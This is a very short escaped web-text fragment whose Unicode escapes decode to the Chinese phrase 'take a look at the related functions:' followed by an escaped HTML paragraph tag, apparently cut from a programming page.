\u67e5\u770b\u4e00\u4e0b\u76f8\u5173\u51fd\u6570\uff1a<\/p>\n
\n